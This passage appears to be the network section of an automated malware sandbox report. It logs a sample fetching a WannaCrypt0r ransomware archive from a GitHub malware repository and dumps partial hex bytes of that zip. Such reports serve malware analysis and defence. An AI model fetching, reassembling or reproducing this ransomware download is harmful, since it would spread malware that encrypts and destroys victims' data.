9e d9 c5 12 86 06 c9 3c 27 48 d8
                                                                                                                                                Data Ascii: | SNV5i3K5}$n`6)NAR#b5iw0?C;5s?FAS<Ba{Koe*nfYFxrti;6H!euH'sQY)Lk"?Q>Ybj|RxQ6%-\<(#t<'H
                                                                                                                                                2022-09-29 12:49:25 UTC4295INData Raw: 03 ad 3d db 62 96 de 80 a6 2e ad 54 6e a9 18 f6 d4 e7 58 c3 a9 25 08 04 f3 23 81 57 6f 8d 15 4b 0d 00 03 38 79 b2 79 64 c8 bb 62 88 2f 18 a5 a1 9c b2 24 b3 08 82 e4 7d 27 2b eb e6 d2 e5 17 fb 47 59 d4 97 b6 5a 8b f1 e1 82 d4 03 01 46 26 a7 f5 8c 8f c7 7e e2 69 72 e8 0f 67 f3 d5 03 8b ab 2b ca 14 75 92 c6 a1 9c ad 09 5a 7d fa 4c 20 aa 36 39 83 76 05 7f 20 b0 b4 46 cd ad 04 62 7b 5c ed 8d 2d 0a af 00 71 cc 7f ca e4 75 cf e2 c1 13 ee 11 0a 6a 5f bf f7 22 d1 b7 df 85 91 4e a1 3b 69 3d 6d 57 95 67 aa 3a 33 da ad 0d f2 de d6 1a 99 ab 5d d3 73 18 e0 f1 3d 5f 09 5c 11 fd eb fa fa 1b 79 c3 2f 8c 02 51 5f 92 4e b2 71 e0 0e e3 55 24 41 ae 04 c2 3f fa cc d4 eb 9c c2 dd 22 50 b9 e2 c1 f3 7e e1 49 d0 1a c3 94 dc 8d 83 cf 24 09 b5 ae 7e 99 91 10 6d a5 ac b3 bf a5 cf da
                                                                                                                                                Data Ascii: =b.TnX%#WoK8yydb/$}'+GYZF&~irg+uZ}L 69v Fb{\-quj_"N;i=mWg:3]s=_\y/Q_NqU$A?"P~I$~m


                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                52192.168.2.349738140.82.121.4443C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                                TimestampkBytes transferredDirectionData
                                                                                                                                                2022-09-29 12:49:26 UTC4300OUTGET /Endermanch/MalwareDatabase/raw/master/ransomwares/WannaCrypt0r.zip HTTP/1.1
                                                                                                                                                Host: github.com


                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                53140.82.121.4443192.168.2.349738C:\Users\user\Desktop\1jDe7zWnoe.exe
                                                                                                                                                TimestampkBytes transferredDirectionData
                                                                                                                                                2022-09-29 12:49:26 UTC4300INHTTP/1.1 302 Found
                                                                                                                                                Server: GitHub.com
                                                                                                                                                Date: Thu, 29 Sep 2022 12:48:27 GMT
                                                                                                                                                Content-Type: text/html; charset=utf-8
                                                                                                                                                Vary: X-PJAX, X-PJAX-Container, Turbo-Visit, Turbo-Frame, Accept-Encoding, Accept, X-Requested-With
                                                                                                                                                Access-Control-Allow-Origin: https://render.githubusercontent.com
                                                                                                                                                Location: https://raw.githubusercontent.com/Endermanch/MalwareDatabase/master/ransomwares/WannaCrypt0r.zip
                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                Strict-Transport-Security: max-age=31536000; includeSubdomains; preload
                                                                                                                                                X-Frame-Options: deny
                                                                                                                                                X-Content-Type-Options: nosniff
                                                                                                                                                X-XSS-Protection: 0
                                                                                                                                                Referrer-Policy: no-referrer-when-downgrade
                                                                                                                                                Expect-CT: max-age=2592000, report-uri="https://api.github.com/_private/browser/errors"
                                                                                                                                                2022-09-29 12:49:26 UTC4301INData Raw: 43 6f 6e 74 65 6e 74 2d 53 65 63 75 72 69 74 79 2d 50 6f 6c 69 63 79 3a 20 64 65 66 61 75 6c 74 2d 73 72 63 20 27 6e 6f 6e 65 27 3b 20 62 61 73 65 2d 75 72 69 20 27 73 65 6c 66 27 3b 20 62 6c 6f 63 6b 2d 61 6c 6c 2d 6d 69 78 65 64 2d 63 6f 6e 74 65 6e 74 3b 20 63 68 69 6c 64 2d 73 72 63 20 67 69 74 68 75 62 2e 63 6f 6d 2f 61 73 73 65 74 73 2d 63 64 6e 2f 77 6f 72 6b 65 72 2f 20 67 69 73 74 2e 67 69 74 68 75 62 2e 63 6f 6d 2f 61 73 73 65 74 73 2d 63 64 6e 2f 77 6f 72 6b 65 72 2f 3b 20 63 6f 6e 6e 65 63 74 2d 73 72 63 20 27 73 65 6c 66 27 20 75 70 6c 6f 61 64 73 2e 67 69 74 68 75 62 2e 63 6f 6d 20 6f 62 6a 65 63 74 73 2d 6f 72 69 67 69 6e 2e 67 69 74 68 75 62 75 73 65 72 63 6f 6e 74 65 6e 74 2e 63 6f 6d 20 77 77 77 2e 67 69 74 68 75 62 73 74 61 74 75 73 2e
                                                                                                                                                Data Ascii: Content-Security-Policy: default-src 'none'; base-uri 'self'; block-all-mixed-content; child-src github.com/assets-cdn/worker/ gist.github.com/assets-cdn/worker/; connect-src 'self' uploads.github.com objects-origin.githubusercontent.com www.githubstatus.


                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                54192.168.2.349739185.199.108.133443C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                                TimestampkBytes transferredDirectionData
                                                                                                                                                2022-09-29 12:49:26 UTC4303OUTGET /Endermanch/MalwareDatabase/master/ransomwares/WannaCrypt0r.zip HTTP/1.1
                                                                                                                                                Host: raw.githubusercontent.com


                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                55185.199.108.133443192.168.2.349739C:\Users\user\Desktop\1jDe7zWnoe.exe
                                                                                                                                                TimestampkBytes transferredDirectionData
                                                                                                                                                2022-09-29 12:49:26 UTC4303INHTTP/1.1 200 OK
                                                                                                                                                Connection: close
                                                                                                                                                Content-Length: 3477754
                                                                                                                                                Cache-Control: max-age=300
                                                                                                                                                Content-Security-Policy: default-src 'none'; style-src 'unsafe-inline'; sandbox
                                                                                                                                                Content-Type: application/zip
                                                                                                                                                ETag: "f2d2308d5c9c4012fb553c82b7938a4339a5db5e022f0a058ece1b06d8a727b6"
                                                                                                                                                Strict-Transport-Security: max-age=31536000
                                                                                                                                                X-Content-Type-Options: nosniff
                                                                                                                                                X-Frame-Options: deny
                                                                                                                                                X-XSS-Protection: 1; mode=block
                                                                                                                                                X-GitHub-Request-Id: 0809:67C0:101C7CA:1115ED1:6335934B
                                                                                                                                                Accept-Ranges: bytes
                                                                                                                                                Date: Thu, 29 Sep 2022 12:49:26 GMT
                                                                                                                                                Via: 1.1 varnish
                                                                                                                                                X-Served-By: cache-mxp6959-MXP
                                                                                                                                                X-Cache: HIT
                                                                                                                                                X-Cache-Hits: 1
                                                                                                                                                X-Timer: S1664455767.929162,VS0,VE5
                                                                                                                                                Vary: Authorization,Accept-Encoding,Origin
                                                                                                                                                Access-Control-Allow-Origin: *
                                                                                                                                                X-Fastly-Request-ID: 3acf7bcff1cd57fade92141a83984c5e57759109
                                                                                                                                                Expires: Thu, 29 Sep 2022 12:54:26 GMT
                                                                                                                                                Source-Age: 267
                                                                                                                                                2022-09-29 12:49:26 UTC4304INData Raw: 50 4b 03 04 14 00 01 00 08 00 ac a3 ad 4a aa fc 22 40 3e 10 35 00 00 a0 35 00 1b 00 00 00 45 6e 64 65 72 6d 61 6e 63 68 40 57 61 6e 6e 61 43 72 79 70 74 30 72 2e 65 78 65 6f 0f db 68 af 01 aa 98 b9 37 e0 93 e8 38 9b 1c 5d 92 7d 1d 81 21 e7 ab 1c 27 cd f4 c9 34 aa 90 bb 64 6c d1 0e 57 d5 03 fa a7 d3 a2 dc 6e 89 67 e9 31 78 19 3b 1f 1d 3a d2 b0 d0 24 57 d4 e1 c6 b3 29 40 d4 13 5d 74 20 b1 b5 85 73 bf 49 ef af a4 c9 4a 92 ab c7 42 0c 3a 9a 7c 98 66 63 4a 0d b6 d9 48 74 53 83 cb 7d 19 58 00 15 50 65 b6 b2 30 8c 14 06 ae e7 66 35 55 df f2 16 2f 88 d0 5e 40 78 9b 4f 9d 09 80 69 94 b2 d3 ca 12 63 f2 d8 fe d2 3a 6e 6f f0 89 ce 22 6d df 96 4f c5 24 c8 8c 8c 8d 2e 85 cc 02 e0 3c 1c fc 48 1b df 66 24 a3 96 9b 30 a0 a8 47 81 f7 56 19 44 83 a0 79 e6 99 0e 57 6e e9 01
                                                                                                                                                Data Ascii: PKJ"@>55Endermanch@WannaCrypt0r.exeoh78]}!'4dlWng1x;:$W)@]t sIJB:|fcJHtS}XPe0f5U/^@xOic:no"mO$.<Hf$0GVDyWn
                                                                                                                                                2022-09-29 12:49:26 UTC4305INData Raw: 91 f8 c1 77 dc 6b 6d b2 2f 09 2e b8 0a ce 32 a8 88 cf 1e 7e 8f ce b6 d4 d0 df 58 c6 fe 47 46 8d 5e 84 d0 1e ca 7f a4 1a 15 4d bb 03 60 a3 3f 1a 45 ca ca 6a 20 6b 7d 58 65 5a e5 1b c7 59 31 24 91 53 1f 77 27 f1 b4 66 fc 10 21 39 75 03 ec 5e f2 8f 52 1e 26 c4 45 29 b1 c7 1c 80 79 c6 a8 93 75 d6 71 68 d3 c3 f4 8b 4a cd af 65 73 f1 47 72 25 c6 d4 26 6b db b4 62 3d 09 46 3a 82 b9 35 32 aa b1 30 4b 40 4c 1a 7a c4 a0 68 b2 17 04 ac bd 81 99 6c ea 0a 9b c2 1f 58 12 a5 17 f5 81 13 cc e6 8a 9e 43 c8 e9 3b 86 4a 79 fb f0 a9 10 c5 5d bd 55 dc 70 df bb 48 eb 5c e2 0b 7f 79 e8 41 b4 0e 12 c4 b4 e2 5c db e8 9e 21 48 fc a0 99 9d e8 bd 4d 5d d8 ae 0a 6f fd 08 09 0b 07 82 80 f8 10 91 6d 86 0f 24 15 15 e9 cc 5a ca c1 9f 61 38 b0 b3 43 36 40 1a 6c ed a0 f7 53 ea 0b ce 8b dd
                                                                                                                                                Data Ascii: wkm/.2~XGF^M`?Ej k}XeZY1$Sw'f!9u^R&E)yuqhJesGr%&kb=F:520K@LzhlXC;Jy]UpH\yA\!HM]om$Za8C6@lS
                                                                                                                                                2022-09-29 12:49:26 UTC4306INData Raw: 69 a7 34 58 c8 26 c9 45 fd 9b d7 12 19 4c ab 25 7c 39 96 5a 5f ef 33 68 66 e1 15 40 2c 93 bd c2 ef 05 68 3b fd 3d 1a f1 5a a0 42 0d 7b 7e 82 d4 85 bb 56 32 bf 93 f1 d4 62 af 6b 16 73 61 9b c1 78 fb 53 95 ce 27 0e e5 88 05 a1 38 a0 a0 e6 e0 f1 85 a4 2e f0 b8 9d ce f0 88 e1 09 b2 62 bd a9 13 d5 67 f2 4d e4 28 c0 35 f1 fb 27 e9 24 e3 dd 50 7f e4 e1 0a d8 50 95 24 ea d2 d7 93 76 3a 0f bf 55 e4 5b 79 ef 96 aa fc fe 9f f7 f4 5c 01 86 e9 e0 59 cb 0b 05 f3 b3 85 f4 09 b9 37 bc 7f 36 48 4c de f6 79 63 48 9c d8 b1 83 37 68 65 a3 1f 08 bb 37 39 ca 5b 82 9c 1e fa d5 46 99 69 fa 88 70 e9 f6 da 58 93 9a 36 b3 ce e7 fe 78 b9 2c ca bf 07 96 63 73 cc e7 ab d7 ce 0c 1b 80 53 bf 28 74 65 7e f5 e0 fc 21 33 ce 4e d2 03 b5 9f 58 8f 3c 49 f8 c4 ba ca e7 5c d6 e3 4b ba 1e 62 f6
                                                                                                                                                Data Ascii: i4X&EL%|9Z_3hf@,h;=ZB{~V2bksaxS'8.bgM(5'$PP$v:U[y\Y76HLycH7he79[FipX6x,csS(te~!3NX<I\Kb
                                                                                                                                                2022-09-29 12:49:26 UTC4308INData Raw: a1 1e ee 3e 04 80 cf b7 6b 88 54 63 cc 38 af 0f b1 83 ad 99 0a 42 d3 46 05 e2 f5 0f f2 2e cb 25 eb 1a a9 f9 50 af 2d 51 d8 19 2c cd 70 b2 0e 22 86 c0 ab 96 ec 3d 8b de 58 6d 9c e5 cc 0d 35 7b f5 22 ec 74 fc 39 92 07 02 8a 3d 8a 13 51 22 2b 0f 77 0e 85 7e eb 06 c4 1f a8 bb 61 90 c1 9a b6 95 51 62 72 aa 95 27 1a b3 71 d3 ec 7f 88 01 33 a2 3c e5 c4 25 70 8b 57 e8 ad c8 38 15 30 dc 4c 36 25 a8 f8 74 be 29 61 c3 1b b8 3c fa 79 51 f2 33 cc 94 87 a1 c2 f9 88 63 ae ae 57 4b 7e 6e 85 0e a0 d4 66 74 b4 4d 2e a1 3f 59 06 29 59 8e c0 0b e3 71 19 b2 72 5a 91 12 b0 6e 5c af 21 54 df d0 51 31 84 5d 55 08 41 c9 03 e6 6c 6e 27 f1 7c 17 df aa d9 21 45 21 73 52 3f 58 cf 3c 14 56 79 f8 0a f1 9a 86 81 d6 2f 75 69 a6 9d 22 12 50 cf 02 12 bd a6 0c 95 5c a2 18 e1 60 49 f2 ea 52
                                                                                                                                                Data Ascii: >kTc8BF.%P-Q,p"=Xm5{"t9=Q"+w~aQbr'q3<%pW80L6%t)a<yQ3cWK~nftM.?Y)YqrZn\!TQ1]UAln'|!E!sR?X<Vy/ui"P\`IR
                                                                                                                                                2022-09-29 12:49:26 UTC4309INData Raw: a2 aa 37 1a a7 78 8d a5 c4 e9 41 72 05 b3 a8 94 89 72 bf d2 0a 42 26 14 ed f5 cb 27 93 f4 f7 a5 d5 c9 c4 b0 9f d9 d8 26 a8 da a0 b6 1b 50 04 8f 98 aa 78 38 80 1f 8e 33 02 18 92 fb 6d 8e 4f 30 97 b5 2f 0b a7 d9 67 76 f4 5a cb 0b 88 34 1e 29 aa ad f2 b5 51 da 5a 48 51 87 00 7d 4f a4 23 1c ad f8 b8 4c 2b 7b 7c f6 a3 7a 91 ec 8f 51 d4 2f 12 5a 6c 39 af f2 ea f5 20 52 fa 68 f0 25 b6 0b 9a 76 2d 2c d4 a7 2f 0c 4f 97 9f 5d a0 ff d9 6f 93 4f a9 c3 d4 39 ba 43 e2 43 f7 48 3f cb 35 79 f2 71 ec 52 57 be cf 44 47 4a 03 8f 77 10 59 49 c1 82 1b 9f 0b ff f4 3d da 4b 9e 4c b1 16 4d 54 2d 3e 67 e8 92 b2 97 29 ba dc cc 5f 2f 1c 4c e9 9e de 16 c8 fc 41 27 7a 0c 2d 80 73 73 a8 c2 d6 9b fa 5c 0c 74 76 5c 88 ec ad 46 c3 06 51 89 47 24 52 9d 1f be 9b 96 f6 0b 80 7b 06 de 99 40
                                                                                                                                                Data Ascii: 7xArrB&'&Px83mO0/gvZ4)QZHQ}O#L+{|zQ/Zl9 Rh%v-,/O]oO9CCH?5yqRWDGJwYI=KLMT->g)_/LA'z-ss\tv\FQG$R{@
                                                                                                                                                2022-09-29 12:49:26 UTC4310INData Raw: 17 47 91 aa 35 df 95 48 e2 3f 1c 22 59 8e ae 84 2d c4 99 90 d5 d1 01 71 c1 e0 e0 bf e9 a2 7d f2 01 25 9f 42 6e e5 0c e4 4b 61 d1 41 c8 42 55 c4 1a d7 bf bc 43 d5 f7 1f 58 16 32 9d 2c 3f c7 d8 d0 00 93 15 85 8e 5b 2e 99 fb 4c 67 39 e6 54 6b ff 33 e4 6b 67 b2 dc 8e bf b6 02 56 4c e4 4d 47 1f cf d3 40 a6 d5 11 18 0a a5 90 32 47 f5 b9 1e d4 f7 72 99 05 20 15 a9 d2 68 c9 88 61 bb 3f 38 62 5e fa 76 01 e2 5e 84 7a 7e 0a e9 1d 25 9c 68 04 fd 61 82 62 8c c2 35 26 95 69 39 e3 a8 18 73 6c 90 60 e8 1b e2 62 f6 75 0e 8c 46 b5 af 1c ca 26 20 0d 8f a5 a9 68 1a 15 96 69 32 26 4e c5 18 9e 1f 56 6b bc 36 8e bf c7 b6 e5 b5 21 47 55 ab 31 0e ab 78 f8 58 a3 ae a8 a4 52 1d d1 69 63 04 4f 50 68 2b d9 55 f8 d6 40 f4 db 7d 97 b1 32 93 95 51 47 a2 8b 94 40 98 b6 77 51 be 5b b9 5c
                                                                                                                                                Data Ascii: G5H?"Y-q}%BnKaABUCX2,?[.Lg9Tk3kgVLMG@2Gr ha?8b^v^z~%hab5&i9sl`buF& hi2&NVk6!GU1xXRicOPh+U@}2QG@wQ[\
                                                                                                                                                2022-09-29 12:49:26 UTC4312INData Raw: bf 4f ed 17 76 44 c7 04 26 f6 75 98 1f 82 00 1b d3 7a 4f df 2e 1e 64 5d 06 20 f2 aa d3 af 93 46 1a ed 33 fb 3f 37 fe 5a ab 04 e7 48 57 66 0b db 57 e1 9b cf cf 72 14 18 7a 3e 8d a4 6d 28 77 59 68 d8 26 a8 8e bd b9 20 7b b3 6f 6a 08 8f d9 e4 42 d9 78 9c b7 44 9a ef 53 54 69 bd ea e7 8d 54 f4 2c d7 73 80 ec c9 10 46 5e 20 0e 55 2d 4e 87 d8 21 b8 b6 c3 68 a6 fa 43 36 02 7a e2 e4 3b ce 9d 56 ce 80 0f cd 4b e7 fd 73 6a af a4 14 e6 6a ee c0 90 88 1b fb 06 bc fe 49 b5 8a e4 31 fd 7f c0 29 1e 47 7c 87 c8 ac e1 65 93 0c a6 04 6f cb b1 f8 bb c3 2f e2 a7 e8 a8 e0 3f d1 64 cd 80 32 0b 56 61 4b 62 de 4c 9e 48 87 15 05 b2 fc 97 7d bf 2c 07 8f cc bb 25 42 b9 ec d2 c8 03 ac 19 2c b0 55 ee 6f 8e dd a5 a6 b4 33 5b 22 19 09 d3 77 13 c7 40 ee b2 f8 af 38 fd 82 8a b4 01 fc c4
                                                                                                                                                Data Ascii: OvD&uzO.d] F3?7ZHWfWrz>m(wYh& {ojBxDSTiT,sF^ U-N!hC6z;VKsjjI1)G|eo/?d2VaKbLH},%B,Uo3["w@8
                                                                                                                                                2022-09-29 12:49:26 UTC4313INData Raw: c0 43 25 18 52 d0 6c d0 14 d5 d7 d0 91 ce e8 b1 1d 00 42 18 00 91 0f bc 62 2f 3c 2a e6 92 2e 9b a8 1b 64 65 d2 a4 68 87 c0 e5 e7 8a 43 6b 0f 6c 3f 83 3e f6 77 29 a5 98 32 0a 4b 95 0b af ca 38 08 b6 6e e8 a3 12 ab 22 c2 30 c0 20 1f 2d a2 00 74 5d 79 85 32 17 7c 5e b7 63 f6 9f 6c 60 81 fe 21 44 94 4c ca 6a b0 ec ae 34 d3 01 44 ea f4 09 51 af 92 45 ea 64 19 ba 61 07 08 ca 77 48 72 5d 03 32 c2 d2 2c 3a 4b 2f 3d 29 e1 f7 14 fc 27 2f 38 70 5a e8 13 bf e4 2b 37 d1 9e 28 7f db 51 71 9f f8 10 bd 87 fb 09 e8 55 89 b5 0e a6 33 fd 95 01 e8 fb 5f dd 33 51 85 7e e3 f1 ab 38 2d 28 69 62 bf 4f 37 98 c2 c4 fb c2 63 5f 2d 6a 1d b2 5a 0a 99 d4 1e 14 8f e1 6d 9d 58 e0 1c b2 10 99 97 a4 e1 5a e5 e0 90 79 74 b1 61 26 e5 e0 70 31 95 8c f5 5b c6 c4 e4 73 21 29 c7 03 f6 3c e7 13
                                                                                                                                                Data Ascii: C%RlBb/<*.dehCkl?>w)2K8n"0 -t]y2|^cl`!DLj4DQEdawHr]2,:K/=)'/8pZ+7(QqU3_3Q~8-(ibO7c_-jZmXZyta&p1[s!)<
                                                                                                                                                2022-09-29 12:49:26 UTC4314INData Raw: 87 51 21 89 d6 11 6d cb 79 45 75 40 76 16 6e f0 07 91 44 cd 9c f0 ed 25 25 f0 12 e7 0f 2b 40 f0 5b ab 96 22 21 38 09 26 cf 2c f0 5d b1 fe 24 a0 87 27 6f 71 aa a3 69 54 44 06 e6 87 2d f8 69 9f 15 18 51 ef 7a ed 8b 62 d5 ae f9 c8 53 7f 78 59 2e c7 70 bf 8e 21 d6 28 a0 2b 3d a6 75 02 04 a6 f4 45 39 93 69 4d 55 88 b6 43 8e 9f f7 91 d4 c2 e4 22 eb 0d ec 70 45 4e 0c ba ff 4a 07 d7 7e c6 0f b0 b7 c1 35 98 23 f7 a3 8e 41 82 9b d0 1d 5f 1f 1f c2 8d 55 2a 6c e9 b1 40 c1 f7 89 e0 f7 b6 0c 3e f1 50 69 66 60 0b d6 f4 c3 14 d3 33 5e 17 6f 58 d0 60 68 2e 0f e3 72 d2 1a 60 62 5b 4e 28 58 87 b5 ee d1 95 eb 97 a2 c0 bf 22 94 89 f7 e2 5d b2 c6 80 aa 6c c2 ac 16 cd 1a fd 70 95 e6 8c fb c6 a0 4d ee d3 51 b3 f1 b6 4f 6f 78 6d 4d 88 e5 34 95 f1 6d dc 81 e6 30 cf cd cc 54 c6 c7
                                                                                                                                                Data Ascii: Q!myEu@vnD%%+@["!8&,]$'oqiTD-iQzbSxY.p!(+=uE9iMUC"pENJ~5#A_U*l@>Pif`3^oX`h.r`b[N(X"]lpMQOoxmM4m0T
                                                                                                                                                2022-09-29 12:49:26 UTC4316INData Raw: 08 d2 fb 1a e4 cc c5 67 54 64 c7 63 41 52 fb 82 db 21 63 3a 9b 88 f9 a8 95 c4 c2 23 c7 ba 21 85 85 5c 7d 12 ba b6 2e 2e ef 8e 71 e5 c2 6a da eb 6e 26 b0 10 88 31 3e a6 fa 10 28 1c 15 f3 de ca 7a 61 f5 7a 3b 86 b3 1d f9 4f 0c d4 15 f6 af 5b 55 5f 2d 56 d4 6b 0b 1b a1 b5 a9 9a 40 bb e2 fb aa b6 da bb e8 5f b5 86 19 fb e5 0a ee ba a7 af 5a 68 b8 2f c3 b3 7e 26 95 c6 8e e1 6e 0e c7 0d 2e 5b 39 ae 1f 55 fc fb c4 1b a4 25 a8 7f 6c 3a c7 e6 b7 34 91 dc 7f 26 32 a0 44 77 66 0b 20 6f 3f c0 dd 14 9b f0 35 a4 fa 52 4e bf 1b 4d 0f b6 cc 84 b5 98 11 7a 2e 3b 79 b0 f7 b1 ed 42 e1 bf 20 9f d4 f1 ca e7 a7 a8 02 b2 a0 cb 8d c0 ed 5b be 21 39 7c ea b4 d4 79 02 e6 5d 51 59 63 69 6a a2 31 aa a3 68 ef 5e cf cc f9 8c 62 0e 39 af 05 11 9e 3c 54 46 33 05 19 b8 12 63 ed 42 f2 7a
                                                                                                                                                Data Ascii: gTdcAR!c:#!\}..qjn&1>(zaz;O[U_-Vk@_Zh/~&n.[9U%l:4&2Dwf o?5RNMz.;yB [!9|y]QYcij1h^b9<TF3cBz
                                                                                                                                                2022-09-29 12:49:26 UTC4317INData Raw: 03 a3 8f c7 d3 76 8f 03 20 1f e7 4e be 90 57 7a 07 33 e6 f9 b1 61 92 e8 e4 63 3d 31 df 0a 16 c9 e6 5c 97 b7 44 3c 83 9c 8f 6c 14 d4 4d 51 9d ed 00 b8 c1 05 bb 33 c9 4c 07 89 f6 fa 26 4a 49 df 17 19 76 62 d5 3c fa f7 6e 95 1e ad da 3c dd 2b 43 63 d6 5f 8c b0 bc ab e7 13 42 eb 11 51 f9 15 6a 0f e5 e6 f8 a7 05 c5 8c 69 7f b9 cf 4e 36 19 05 a5 86 09 26 cf cd 4f 21 65 2f f0 e2 07 66 1a 72 98 3d e2 bf ae 74 63 26 88 98 3f 9c 39 e6 38 ef 96 7d 1d d0 a8 48 4b 42 14 d4 d8 2c 31 6a 3a fa e9 13 a8 7c 5a 0c 2c 18 bb fc 56 d1 be 90 0a b7 e9 16 06 8a 46 fc b4 0a f2 f1 85 e3 96 16 28 b6 88 df 63 71 7e 21 9d b2 ed e6 a1 0a 79 4b 34 3d d3 b3 c9 77 11 d7 59 65 bd ea b5 88 0c 4a 42 c2 97 2d fc b6 d4 19 51 75 5f a1 e4 c3 46 23 f8 76 a7 e8 4d a1 05 0f 41 f6 46 d8 43 5b 5d d9
                                                                                                                                                Data Ascii: v NWz3ac=1\D<lMQ3L&JIvb<n<+Cc_BQjiN6&O!e/fr=tc&?98}HKB,1j:|Z,VF(cq~!yK4=wYeJB-Qu_F#vMAFC[]
                                                                                                                                                2022-09-29 12:49:26 UTC4318INData Raw: 1d e0 87 e7 91 db 41 98 a2 47 96 3d 69 fb 29 46 27 1b 98 e4 2e 23 d7 00 82 82 5e da 5d eb a5 31 f1 86 77 60 47 d0 c1 37 93 4b bd 33 e3 81 da bd f2 29 e4 02 cb ce 49 4a 28 13 47 21 08 94 36 c8 3a 4c 5e 3c 80 2c 1f c2 66 e8 24 14 2f 3b 6b cb 93 e4 46 fe 9a a5 17 ef d9 68 89 03 d3 f7 e6 ce 41 a2 73 8e cf bd 14 4e e0 74 70 93 4b 02 21 f1 71 b0 79 cc 7e 26 0d b3 f9 a1 a7 94 f8 f1 fa 6a 31 e7 ae f3 53 45 9a e9 f3 af a9 97 d7 f1 fe 34 38 55 14 cb 0b f2 69 7a 9e c2 f1 ed 60 b8 1b e4 d1 da 71 82 7f 44 01 b7 01 ab 58 aa 85 d6 07 e0 8d dc ac f3 22 0e 92 31 d4 72 7c 52 a0 27 b2 8d 33 38 ce 43 f6 4d e7 eb db 6a a1 a6 0e cc 5b b3 0f 5a 15 51 ee e1 f4 14 65 4b 9c 5e 2a 80 7e 21 d2 09 43 7d 75 49 c6 9f a3 fa ee 8c 88 95 ac 95 8a b4 ba a1 89 4f 1e 98 a0 3a 8d 08 71 f0 b3
                                                                                                                                                Data Ascii: AG=i)F'.#^]1w`G7K3)IJ(G!6:L^<,f$/;kFhAsNtpK!qy~&j1SE48Uiz`qDX"1r|R'38CMj[ZQeK^*~!C}uIO:q
                                                                                                                                                2022-09-29 12:49:26 UTC4319INData Raw: 2b a6 d8 e2 4c 8d 60 44 03 5e ef ce 4d 8f 97 ca 25 f4 b8 a1 da 9c ba 2b ed 79 4f 91 02 2d 3c a4 b7 10 3f 87 d0 f1 74 c5 2d 1a 57 39 72 39 1b 92 fd d8 2d 5e 64 4a 12 55 2c 18 5f 39 05 5e 98 17 41 8d 1d 59 fa 06 a7 67 31 86 e9 ed d8 d1 a2 b2 05 94 79 57 1e 24 57 c8 d7 99 7b 28 39 74 94 44 70 5b d0 87 c1 ea b5 f1 d9 76 28 fd 10 20 29 bd 65 cc 61 b1 3b 59 00 e5 92 39 1b 6b b2 aa 7c 3c 7b 4c 0f 41 6d 9b c8 56 41 64 19 77 97 d0 7c 59 c6 16 e9 ff 51 31 c9 70 d6 eb a2 68 6e 2f 07 c8 6b e9 db c3 8a 44 66 26 1e 6f 92 e8 9e 90 10 01 ae e9 6e 08 cd 8f a3 c4 70 03 d2 72 49 e6 5e 15 c7 0a 93 1b 9e 78 21 48 d2 03 11 22 d0 ff 7e 0e 13 7f fa 01 25 7e 08 c7 74 fe cf f7 80 73 40 d0 d3 fc 92 00 12 0d 40 54 76 53 eb 3d 33 3e 68 09 72 64 43 bd b6 e9 aa 42 28 04 de 94 19 8a 3d
                                                                                                                                                Data Ascii: +L`D^M%+yO-<?t-W9r9-^dJU,_9^AYg1yW$W{(9tDp[v( )ea;Y9k|<{LAmVAdw|YQ1phn/kDf&onprI^x!H"~%~ts@@TvS=3>hrdCB(=
                                                                                                                                                2022-09-29 12:49:26 UTC4335INData Raw: fd 32 3f 86 3d f0 dd 78 89 30 04 9e 95 69 b4 dc 1a b5 4a e6 18 38 50 9f 25 a9 a2 8f 80 55 05 e6 76 64 19 d0 a3 2b a3 51 d6 31 e7 1a d6 e5 24 d0 fa 40 17 9a e0 47 d5 37 be 2f 88 19 50 52 35 4d 5c 26 0e d4 84 51 01 0a 3c 65 2b 68 0e c5 80 bf f7 e4 c7 3d fa e9 19 a9 52 65 b7 6f d1 ff c8 e2 c6 66 c2 3a e8 87 ad d4 0d dc eb ee 0c e7 1c 5c 43 2f e0 6d 29 10 38 f6 3a 0c 30 a3 e6 cb a9 6d b9 af ee 33 0b 7f 50 6c b1 df 12 ac e3 dc d0 67 a6 01 29 6e ee 1b 43 9f 6e 8d e4 18 6e 2a c6 f6 96 ea 97 1f 3e 3d ba 2a df 22 22 a5 57 a3 bc 00 bb 14 20 ec d2 6f b0 55 3a 98 1f a9 0d 6a a0 bb 7a 7c 00 28 09 60 38 84 2b 09 a1 f6 5e d7 81 d0 77 aa f2 12 80 47 af 25 53 7d 33 bd f8 0a c4 79 bc 05 81 31 bb c2 23 65 1f 7c 4f f9 2a 69 8f f7 f5 06 f4 3d c0 0b b9 00 e2 f3 ce 13 cb 1f 76
                                                                                                                                                Data Ascii: 2?=x0iJ8P%Uvd+Q1$@G7/PR5M\&Q<e+h=Reof:\C/m)8:0m3Plg)nCnn*>=*""W oU:jz|(`8+^wG%S}3y1#e|O*i=v
                                                                                                                                                2022-09-29 12:49:26 UTC4351INData Raw: 73 d3 c3 5f c2 9a 05 48 ba 5a 5a d4 db a8 cb 8d d0 fb 64 36 e0 21 b7 bd 83 4e 9b e8 c0 9d c7 1f 22 6e 9c 2c bc 13 d0 ac d7 5f 99 91 a3 58 af af e0 f2 84 7d e5 22 7c bd d1 c8 6c a8 6d 80 2d 62 68 5f 21 fa 66 c8 99 18 40 56 8e d9 94 ce 04 ce 3b f1 52 00 a9 12 9e 44 42 90 24 14 9e 7c 20 30 47 9f a6 b2 12 63 89 97 99 05 ce a9 76 c6 42 e7 5d a5 5d 5a 0f 47 8c 2f a4 f9 ef 3c c2 44 e7 85 e6 0f cd 89 a5 f1 25 3b 9c 76 cd 24 41 44 f0 23 98 6e 90 39 c1 5c 62 e7 89 ae b4 88 4f 62 4f ce a4 00 dd b3 06 e0 f0 04 48 46 b0 8e d4 3b c8 75 99 06 e5 26 57 9b 37 ea f7 7e 52 9e 53 8d b5 29 0e b0 25 79 9a 4c 2b 12 29 53 12 d9 6c 08 24 a9 f2 10 c8 fb 95 30 d0 8f 2f c2 d5 be 01 06 02 5c 84 9b c2 3d 86 04 11 e0 89 de dc 5e b8 ce 2f 0a d6 13 43 29 2e f9 12 26 22 32 a3 e8 f8 36 88
